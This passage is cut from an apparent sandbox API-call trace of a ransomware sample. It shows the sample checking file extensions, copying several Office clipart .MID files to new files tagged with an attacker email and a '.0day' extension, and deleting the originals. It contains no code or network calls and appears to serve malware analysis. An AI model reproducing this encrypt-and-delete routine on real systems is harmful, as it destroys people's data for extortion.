OLEDB\\10\\Resources\\1033\\msmdsrv.rll") returned 83 [0268.844] lstrlenW (lpString=".dbf") returned 4 [0268.844] lstrcmpiW (lpString1=".dbf", lpString2=".rll") returned -1 [0268.844] lstrlenW (lpString="C:\\Program Files\\Microsoft Analysis Services\\AS OLEDB\\10\\Resources\\1033\\msmdsrv.rll") returned 83 [0268.844] lstrlenW (lpString=".1cd") returned 4 [0268.844] lstrcmpiW (lpString1=".1cd", lpString2=".rll") returned -1 [0268.845] lstrlenW (lpString="C:\\Program Files\\Microsoft Analysis Services\\AS OLEDB\\10\\Resources\\1033\\msmdsrv.rll") returned 83 [0268.845] lstrlenW (lpString=".jpg") returned 4 [0268.845] lstrcmpiW (lpString1=".jpg", lpString2=".rll") returned -1 [0268.845] lstrlenW (lpString="C:\\Program Files\\Microsoft Analysis Services\\AS OLEDB\\10\\Resources\\1033\\msmdsrv.rll") returned 83 [0268.845] lstrlenW (lpString="C:\\Program Files\\Microsoft Analysis Services\\AS OLEDB\\10\\Resources\\1033\\msmdsrv.rll") returned 83 [0268.845] lstrlenW (lpString=".doc") returned 4 [0268.845] lstrcmpiW (lpString1=".doc", lpString2=".rll") returned -1 [0268.845] lstrlenW (lpString=".docx") returned 5 [0268.845] lstrcmpiW (lpString1=".docx", lpString2="v.rll") returned -1 [0268.845] lstrlenW (lpString=".pdf") returned 4 [0268.845] lstrcmpiW (lpString1=".pdf", lpString2=".rll") returned -1 [0268.845] lstrlenW (lpString=".xls") returned 4 [0268.845] lstrcmpiW (lpString1=".xls", lpString2=".rll") returned 1 [0268.845] lstrlenW (lpString=".xlsx") returned 5 [0268.845] lstrcmpiW (lpString1=".xlsx", lpString2="v.rll") returned -1 [0268.845] lstrlenW (lpString=".ppt") returned 4 [0268.845] lstrcmpiW (lpString1=".ppt", lpString2=".rll") returned -1 [0268.845] lstrlenW (lpString="C:\\Program Files\\Microsoft Analysis Services\\AS OLEDB\\10\\Resources\\1033\\msmdsrv.rll") returned 83 [0268.845] lstrlenW (lpString=".zip") returned 4 [0268.845] lstrcmpiW (lpString1=".zip", lpString2=".rll") returned 1 [0268.845] lstrlenW (lpString=".rar") returned 4 [0268.845] lstrcmpiW (lpString1=".rar", lpString2=".rll") returned -1 [0268.845] lstrlenW (lpString=".bz2") returned 4 [0268.845] lstrcmpiW (lpString1=".bz2", lpString2=".rll") returned -1 [0268.845] lstrlenW (lpString=".7z") returned 3 [0268.845] lstrcmpiW (lpString1=".7z", lpString2="rll") returned -1 [0268.845] lstrlenW (lpString="C:\\Program Files\\Microsoft Analysis Services\\AS OLEDB\\10\\Resources\\1033\\msmdsrv.rll") returned 83 [0268.845] lstrlenW (lpString=".dbf") returned 4 [0268.846] lstrcmpiW (lpString1=".dbf", lpString2=".rll") returned -1 [0268.846] lstrlenW (lpString="C:\\Program Files\\Microsoft Analysis Services\\AS OLEDB\\10\\Resources\\1033\\msmdsrv.rll") returned 83 [0268.846] lstrlenW (lpString=".1cd") returned 4 [0268.846] lstrcmpiW (lpString1=".1cd", lpString2=".rll") returned -1 [0268.846] lstrlenW (lpString="C:\\Program Files\\Microsoft Analysis Services\\AS OLEDB\\10\\Resources\\1033\\msmdsrv.rll") returned 83 [0268.846] lstrlenW (lpString=".jpg") returned 4 [0268.846] lstrcmpiW (lpString1=".jpg", lpString2=".rll") returned -1 [0268.846] lstrcmpiW (lpString1=".MID", lpString2=".0day") returned 1 [0268.846] lstrlenW (lpString="EAST_01.MID") returned 11 [0268.846] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\EAST_01.MID" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\east_01.mid"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x354 [0269.478] GetFileSizeEx (in: hFile=0x354, lpFileSize=0x3b9ff1c | out: lpFileSize=0x3b9ff1c*=6165) returned 1 [0269.478] CloseHandle (hObject=0x354) returned 1 [0269.478] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\EAST_01.MID" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\east_01.mid")) returned 0x20 [0269.574] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\EAST_01.MID.id-9C354B42.[my0day@aol.com].0day" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\east_01.mid.id-9c354b42.[my0day@aol.com].0day")) returned 0xffffffff [0269.706] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\EAST_01.MID" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\east_01.mid"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x2cc [0269.706] SetFilePointerEx (in: hFile=0x2cc, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x3b9fec8 | out: lpNewFilePointer=0x0) returned 1 [0269.706] SetFilePointerEx (in: hFile=0x2cc, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x3b9fec8 | out: lpNewFilePointer=0x0) returned 1 [0269.706] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\EAST_01.MID.id-9C354B42.[my0day@aol.com].0day" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\east_01.mid.id-9c354b42.[my0day@aol.com].0day"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x38c [0270.429] GetLastError () returned 0x0 [0270.429] ReadFile (in: hFile=0x2cc, lpBuffer=0x43f0020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x3b9fed4, lpOverlapped=0x0 | out: lpBuffer=0x43f0020*, lpNumberOfBytesRead=0x3b9fed4*=0x1815, lpOverlapped=0x0) returned 1 [0270.434] WriteFile (in: hFile=0x38c, lpBuffer=0x43f0020*, nNumberOfBytesToWrite=0x1820, lpNumberOfBytesWritten=0x3b9fc9c, lpOverlapped=0x0 | out: lpBuffer=0x43f0020*, lpNumberOfBytesWritten=0x3b9fc9c*=0x1820, lpOverlapped=0x0) returned 1 [0270.435] ReadFile (in: hFile=0x2cc, lpBuffer=0x43f0020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x3b9fed4, lpOverlapped=0x0 | out: lpBuffer=0x43f0020*, lpNumberOfBytesRead=0x3b9fed4*=0x0, lpOverlapped=0x0) returned 1 [0270.435] WriteFile (in: hFile=0x38c, lpBuffer=0x43f0020*, nNumberOfBytesToWrite=0xea, lpNumberOfBytesWritten=0x3b9fc9c, lpOverlapped=0x0 | out: lpBuffer=0x43f0020*, lpNumberOfBytesWritten=0x3b9fc9c*=0xea, lpOverlapped=0x0) returned 1 [0270.436] SetEndOfFile (hFile=0x38c) returned 1 [0270.436] CloseHandle (hObject=0x38c) returned 1 [0270.436] SetFilePointerEx (in: hFile=0x2cc, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x3b9fec8 | out: lpNewFilePointer=0x0) returned 1 [0270.436] SetEndOfFile (hFile=0x2cc) returned 1 [0270.439] CloseHandle (hObject=0x2cc) returned 1 [0270.439] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\EAST_01.MID.id-9C354B42.[my0day@aol.com].0day", dwFileAttributes=0x20) returned 1 [0270.439] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\EAST_01.MID" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\east_01.mid")) returned 1 [0270.439] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\EAST_01.MID") returned 62 [0270.439] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\EAST_01.MID") returned 62 [0270.440] lstrlenW (lpString=".doc") returned 4 [0270.440] lstrcmpiW (lpString1=".doc", lpString2=".MID") returned -1 [0270.440] lstrlenW (lpString=".docx") returned 5 [0270.440] lstrcmpiW (lpString1=".docx", lpString2="1.MID") returned -1 [0270.440] lstrlenW (lpString=".pdf") returned 4 [0270.440] lstrcmpiW (lpString1=".pdf", lpString2=".MID") returned 1 [0270.440] lstrlenW (lpString=".xls") returned 4 [0270.440] lstrcmpiW (lpString1=".xls", lpString2=".MID") returned 1 [0270.440] lstrlenW (lpString=".xlsx") returned 5 [0270.440] lstrcmpiW (lpString1=".xlsx", lpString2="1.MID") returned -1 [0270.440] lstrlenW (lpString=".ppt") returned 4 [0270.440] lstrcmpiW (lpString1=".ppt", lpString2=".MID") returned 1 [0270.440] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\EAST_01.MID") returned 62 [0270.440] lstrlenW (lpString=".zip") returned 4 [0270.440] lstrcmpiW (lpString1=".zip", lpString2=".MID") returned 1 [0270.440] lstrlenW (lpString=".rar") returned 4 [0270.440] lstrcmpiW (lpString1=".rar", lpString2=".MID") returned 1 [0270.440] lstrlenW (lpString=".bz2") returned 4 [0270.440] lstrcmpiW (lpString1=".bz2", lpString2=".MID") returned -1 [0270.440] lstrlenW (lpString=".7z") returned 3 [0270.440] lstrcmpiW (lpString1=".7z", lpString2="MID") returned -1 [0270.440] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\EAST_01.MID") returned 62 [0270.440] lstrlenW (lpString=".dbf") returned 4 [0270.440] lstrcmpiW (lpString1=".dbf", lpString2=".MID") returned -1 [0270.440] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\EAST_01.MID") returned 62 [0270.440] lstrlenW (lpString=".1cd") returned 4 [0270.440] lstrcmpiW (lpString1=".1cd", lpString2=".MID") returned -1 [0270.440] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\EAST_01.MID") returned 62 [0270.440] lstrlenW (lpString=".jpg") returned 4 [0270.440] lstrcmpiW (lpString1=".jpg", lpString2=".MID") returned -1 [0270.441] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\EAST_01.MID") returned 62 [0270.441] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\EAST_01.MID") returned 62 [0270.441] lstrlenW (lpString=".doc") returned 4 [0270.441] lstrcmpiW (lpString1=".doc", lpString2=".MID") returned -1 [0270.441] lstrlenW (lpString=".docx") returned 5 [0270.441] lstrcmpiW (lpString1=".docx", lpString2="1.MID") returned -1 [0270.441] lstrlenW (lpString=".pdf") returned 4 [0270.441] lstrcmpiW (lpString1=".pdf", lpString2=".MID") returned 1 [0270.441] lstrlenW (lpString=".xls") returned 4 [0270.441] lstrcmpiW (lpString1=".xls", lpString2=".MID") returned 1 [0270.441] lstrlenW (lpString=".xlsx") returned 5 [0270.441] lstrcmpiW (lpString1=".xlsx", lpString2="1.MID") returned -1 [0270.441] lstrlenW (lpString=".ppt") returned 4 [0270.441] lstrcmpiW (lpString1=".ppt", lpString2=".MID") returned 1 [0270.441] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\EAST_01.MID") returned 62 [0270.441] lstrlenW (lpString=".zip") returned 4 [0270.441] lstrcmpiW (lpString1=".zip", lpString2=".MID") returned 1 [0270.441] lstrlenW (lpString=".rar") returned 4 [0270.441] lstrcmpiW (lpString1=".rar", lpString2=".MID") returned 1 [0270.441] lstrlenW (lpString=".bz2") returned 4 [0270.441] lstrcmpiW (lpString1=".bz2", lpString2=".MID") returned -1 [0270.441] lstrlenW (lpString=".7z") returned 3 [0270.441] lstrcmpiW (lpString1=".7z", lpString2="MID") returned -1 [0270.441] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\EAST_01.MID") returned 62 [0270.441] lstrlenW (lpString=".dbf") returned 4 [0270.441] lstrcmpiW (lpString1=".dbf", lpString2=".MID") returned -1 [0270.441] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\EAST_01.MID") returned 62 [0270.441] lstrlenW (lpString=".1cd") returned 4 [0270.441] lstrcmpiW (lpString1=".1cd", lpString2=".MID") returned -1 [0270.441] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\EAST_01.MID") returned 62 [0270.441] lstrlenW (lpString=".jpg") returned 4 [0270.441] lstrcmpiW (lpString1=".jpg", lpString2=".MID") returned -1 [0270.442] lstrcmpiW (lpString1=".MID", lpString2=".0day") returned 1 [0270.442] lstrlenW (lpString="GRDEN_01.MID") returned 12 [0270.442] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\GRDEN_01.MID" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\grden_01.mid"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x2cc [0270.449] GetFileSizeEx (in: hFile=0x2cc, lpFileSize=0x3b9ff1c | out: lpFileSize=0x3b9ff1c*=7567) returned 1 [0270.449] CloseHandle (hObject=0x2cc) returned 1 [0270.449] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\GRDEN_01.MID" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\grden_01.mid")) returned 0x20 [0270.497] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\GRDEN_01.MID.id-9C354B42.[my0day@aol.com].0day" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\grden_01.mid.id-9c354b42.[my0day@aol.com].0day")) returned 0xffffffff [0270.506] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\GRDEN_01.MID" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\grden_01.mid"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x2cc [0270.571] SetFilePointerEx (in: hFile=0x2cc, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x3b9fec8 | out: lpNewFilePointer=0x0) returned 1 [0270.571] SetFilePointerEx (in: hFile=0x2cc, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x3b9fec8 | out: lpNewFilePointer=0x0) returned 1 [0270.571] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\GRDEN_01.MID.id-9C354B42.[my0day@aol.com].0day" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\grden_01.mid.id-9c354b42.[my0day@aol.com].0day"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x37c [0270.640] GetLastError () returned 0x0 [0270.640] ReadFile (in: hFile=0x2cc, lpBuffer=0x43f0020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x3b9fed4, lpOverlapped=0x0 | out: lpBuffer=0x43f0020*, lpNumberOfBytesRead=0x3b9fed4*=0x1d8f, lpOverlapped=0x0) returned 1 [0270.677] WriteFile (in: hFile=0x37c, lpBuffer=0x43f0020*, nNumberOfBytesToWrite=0x1d90, lpNumberOfBytesWritten=0x3b9fc9c, lpOverlapped=0x0 | out: lpBuffer=0x43f0020*, lpNumberOfBytesWritten=0x3b9fc9c*=0x1d90, lpOverlapped=0x0) returned 1 [0270.678] ReadFile (in: hFile=0x2cc, lpBuffer=0x43f0020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x3b9fed4, lpOverlapped=0x0 | out: lpBuffer=0x43f0020*, lpNumberOfBytesRead=0x3b9fed4*=0x0, lpOverlapped=0x0) returned 1 [0270.678] WriteFile (in: hFile=0x37c, lpBuffer=0x43f0020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0x3b9fc9c, lpOverlapped=0x0 | out: lpBuffer=0x43f0020*, lpNumberOfBytesWritten=0x3b9fc9c*=0xec, lpOverlapped=0x0) returned 1 [0270.678] SetEndOfFile (hFile=0x37c) returned 1 [0270.679] CloseHandle (hObject=0x37c) returned 1 [0270.679] SetFilePointerEx (in: hFile=0x2cc, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x3b9fec8 | out: lpNewFilePointer=0x0) returned 1 [0270.679] SetEndOfFile (hFile=0x2cc) returned 1 [0270.681] CloseHandle (hObject=0x2cc) returned 1 [0270.681] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\GRDEN_01.MID.id-9C354B42.[my0day@aol.com].0day", dwFileAttributes=0x20) returned 1 [0270.697] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\GRDEN_01.MID" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\grden_01.mid")) returned 1 [0270.750] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\GRDEN_01.MID") returned 63 [0270.750] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\GRDEN_01.MID") returned 63 [0270.750] lstrlenW (lpString=".doc") returned 4 [0270.750] lstrcmpiW (lpString1=".doc", lpString2=".MID") returned -1 [0270.750] lstrlenW (lpString=".docx") returned 5 [0270.750] lstrcmpiW (lpString1=".docx", lpString2="1.MID") returned -1 [0270.750] lstrlenW (lpString=".pdf") returned 4 [0270.750] lstrcmpiW (lpString1=".pdf", lpString2=".MID") returned 1 [0270.750] lstrlenW (lpString=".xls") returned 4 [0270.750] lstrcmpiW (lpString1=".xls", lpString2=".MID") returned 1 [0270.750] lstrlenW (lpString=".xlsx") returned 5 [0270.750] lstrcmpiW (lpString1=".xlsx", lpString2="1.MID") returned -1 [0270.750] lstrlenW (lpString=".ppt") returned 4 [0270.750] lstrcmpiW (lpString1=".ppt", lpString2=".MID") returned 1 [0270.750] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\GRDEN_01.MID") returned 63 [0270.750] lstrlenW (lpString=".zip") returned 4 [0270.750] lstrcmpiW (lpString1=".zip", lpString2=".MID") returned 1 [0270.751] lstrlenW (lpString=".rar") returned 4 [0270.751] lstrcmpiW (lpString1=".rar", lpString2=".MID") returned 1 [0270.751] lstrlenW (lpString=".bz2") returned 4 [0270.751] lstrcmpiW (lpString1=".bz2", lpString2=".MID") returned -1 [0270.751] lstrlenW (lpString=".7z") returned 3 [0270.751] lstrcmpiW (lpString1=".7z", lpString2="MID") returned -1 [0270.751] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\GRDEN_01.MID") returned 63 [0270.751] lstrlenW (lpString=".dbf") returned 4 [0270.751] lstrcmpiW (lpString1=".dbf", lpString2=".MID") returned -1 [0270.751] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\GRDEN_01.MID") returned 63 [0270.751] lstrlenW (lpString=".1cd") returned 4 [0270.751] lstrcmpiW (lpString1=".1cd", lpString2=".MID") returned -1 [0270.751] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\GRDEN_01.MID") returned 63 [0270.751] lstrlenW (lpString=".jpg") returned 4 [0270.751] lstrcmpiW (lpString1=".jpg", lpString2=".MID") returned -1 [0270.751] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\GRDEN_01.MID") returned 63 [0270.751] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\GRDEN_01.MID") returned 63 [0270.751] lstrlenW (lpString=".doc") returned 4 [0270.751] lstrcmpiW (lpString1=".doc", lpString2=".MID") returned -1 [0270.751] lstrlenW (lpString=".docx") returned 5 [0270.751] lstrcmpiW (lpString1=".docx", lpString2="1.MID") returned -1 [0270.751] lstrlenW (lpString=".pdf") returned 4 [0270.751] lstrcmpiW (lpString1=".pdf", lpString2=".MID") returned 1 [0270.751] lstrlenW (lpString=".xls") returned 4 [0270.751] lstrcmpiW (lpString1=".xls", lpString2=".MID") returned 1 [0270.751] lstrlenW (lpString=".xlsx") returned 5 [0270.751] lstrcmpiW (lpString1=".xlsx", lpString2="1.MID") returned -1 [0270.751] lstrlenW (lpString=".ppt") returned 4 [0270.751] lstrcmpiW (lpString1=".ppt", lpString2=".MID") returned 1 [0270.751] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\GRDEN_01.MID") returned 63 [0270.751] lstrlenW (lpString=".zip") returned 4 [0270.751] lstrcmpiW (lpString1=".zip", lpString2=".MID") returned 1 [0270.751] lstrlenW (lpString=".rar") returned 4 [0270.752] lstrcmpiW (lpString1=".rar", lpString2=".MID") returned 1 [0270.752] lstrlenW (lpString=".bz2") returned 4 [0270.752] lstrcmpiW (lpString1=".bz2", lpString2=".MID") returned -1 [0270.752] lstrlenW (lpString=".7z") returned 3 [0270.752] lstrcmpiW (lpString1=".7z", lpString2="MID") returned -1 [0270.752] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\GRDEN_01.MID") returned 63 [0270.752] lstrlenW (lpString=".dbf") returned 4 [0270.752] lstrcmpiW (lpString1=".dbf", lpString2=".MID") returned -1 [0270.752] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\GRDEN_01.MID") returned 63 [0270.752] lstrlenW (lpString=".1cd") returned 4 [0270.752] lstrcmpiW (lpString1=".1cd", lpString2=".MID") returned -1 [0270.752] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\GRDEN_01.MID") returned 63 [0270.752] lstrlenW (lpString=".jpg") returned 4 [0270.752] lstrcmpiW (lpString1=".jpg", lpString2=".MID") returned -1 [0270.752] lstrcmpiW (lpString1=".MID", lpString2=".0day") returned 1 [0270.752] lstrlenW (lpString="PAPER_01.MID") returned 12 [0270.752] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\PAPER_01.MID" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\paper_01.mid"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x384 [0270.989] GetFileSizeEx (in: hFile=0x384, lpFileSize=0x3b9ff1c | out: lpFileSize=0x3b9ff1c*=6763) returned 1 [0270.989] CloseHandle (hObject=0x384) returned 1 [0270.989] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\PAPER_01.MID" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\paper_01.mid")) returned 0x20 [0270.989] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\PAPER_01.MID.id-9C354B42.[my0day@aol.com].0day" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\paper_01.mid.id-9c354b42.[my0day@aol.com].0day")) returned 0xffffffff [0270.991] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\PAPER_01.MID" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\paper_01.mid"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x37c [0271.003] SetFilePointerEx (in: hFile=0x37c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x3b9fec8 | out: lpNewFilePointer=0x0) returned 1 [0271.003] SetFilePointerEx (in: hFile=0x37c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x3b9fec8 | out: lpNewFilePointer=0x0) returned 1 [0271.003] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\PAPER_01.MID.id-9C354B42.[my0day@aol.com].0day" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\paper_01.mid.id-9c354b42.[my0day@aol.com].0day"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x380 [0271.070] GetLastError () returned 0x0 [0271.070] ReadFile (in: hFile=0x37c, lpBuffer=0x43f0020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x3b9fed4, lpOverlapped=0x0 | out: lpBuffer=0x43f0020*, lpNumberOfBytesRead=0x3b9fed4*=0x1a6b, lpOverlapped=0x0) returned 1 [0271.074] WriteFile (in: hFile=0x380, lpBuffer=0x43f0020*, nNumberOfBytesToWrite=0x1a70, lpNumberOfBytesWritten=0x3b9fc9c, lpOverlapped=0x0 | out: lpBuffer=0x43f0020*, lpNumberOfBytesWritten=0x3b9fc9c*=0x1a70, lpOverlapped=0x0) returned 1 [0271.075] ReadFile (in: hFile=0x37c, lpBuffer=0x43f0020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x3b9fed4, lpOverlapped=0x0 | out: lpBuffer=0x43f0020*, lpNumberOfBytesRead=0x3b9fed4*=0x0, lpOverlapped=0x0) returned 1 [0271.075] WriteFile (in: hFile=0x380, lpBuffer=0x43f0020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0x3b9fc9c, lpOverlapped=0x0 | out: lpBuffer=0x43f0020*, lpNumberOfBytesWritten=0x3b9fc9c*=0xec, lpOverlapped=0x0) returned 1 [0271.075] SetEndOfFile (hFile=0x380) returned 1 [0271.075] CloseHandle (hObject=0x380) returned 1 [0271.075] SetFilePointerEx (in: hFile=0x37c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x3b9fec8 | out: lpNewFilePointer=0x0) returned 1 [0271.075] SetEndOfFile (hFile=0x37c) returned 1 [0271.078] CloseHandle (hObject=0x37c) returned 1 [0271.079] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\PAPER_01.MID.id-9C354B42.[my0day@aol.com].0day", dwFileAttributes=0x20) returned 1 [0271.130] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\PAPER_01.MID" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\paper_01.mid")) returned 1 [0271.157] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\PAPER_01.MID") returned 63 [0271.157] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\PAPER_01.MID") returned 63 [0271.157] lstrlenW (lpString=".doc") returned 4 [0271.157] lstrcmpiW (lpString1=".doc", lpString2=".MID") returned -1 [0271.157] lstrlenW (lpString=".docx") returned 5 [0271.157] lstrcmpiW (lpString1=".docx", lpString2="1.MID") returned -1 [0271.157] lstrlenW (lpString=".pdf") returned 4 [0271.157] lstrcmpiW (lpString1=".pdf", lpString2=".MID") returned 1 [0271.157] lstrlenW (lpString=".xls") returned 4 [0271.158] lstrcmpiW (lpString1=".xls", lpString2=".MID") returned 1 [0271.158] lstrlenW (lpString=".xlsx") returned 5 [0271.158] lstrcmpiW (lpString1=".xlsx", lpString2="1.MID") returned -1 [0271.158] lstrlenW (lpString=".ppt") returned 4 [0271.158] lstrcmpiW (lpString1=".ppt", lpString2=".MID") returned 1 [0271.158] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\PAPER_01.MID") returned 63 [0271.158] lstrlenW (lpString=".zip") returned 4 [0271.158] lstrcmpiW (lpString1=".zip", lpString2=".MID") returned 1 [0271.158] lstrlenW (lpString=".rar") returned 4 [0271.158] lstrcmpiW (lpString1=".rar", lpString2=".MID") returned 1 [0271.158] lstrlenW (lpString=".bz2") returned 4 [0271.158] lstrcmpiW (lpString1=".bz2", lpString2=".MID") returned -1 [0271.158] lstrlenW (lpString=".7z") returned 3 [0271.158] lstrcmpiW (lpString1=".7z", lpString2="MID") returned -1 [0271.158] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\PAPER_01.MID") returned 63 [0271.158] lstrlenW (lpString=".dbf") returned 4 [0271.158] lstrcmpiW (lpString1=".dbf", lpString2=".MID") returned -1 [0271.158] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\PAPER_01.MID") returned 63 [0271.158] lstrlenW (lpString=".1cd") returned 4 [0271.158] lstrcmpiW (lpString1=".1cd", lpString2=".MID") returned -1 [0271.158] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\PAPER_01.MID") returned 63 [0271.158] lstrlenW (lpString=".jpg") returned 4 [0271.158] lstrcmpiW (lpString1=".jpg", lpString2=".MID") returned -1 [0271.158] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\PAPER_01.MID") returned 63 [0271.158] lstrlenW (lpString="C:\\Program 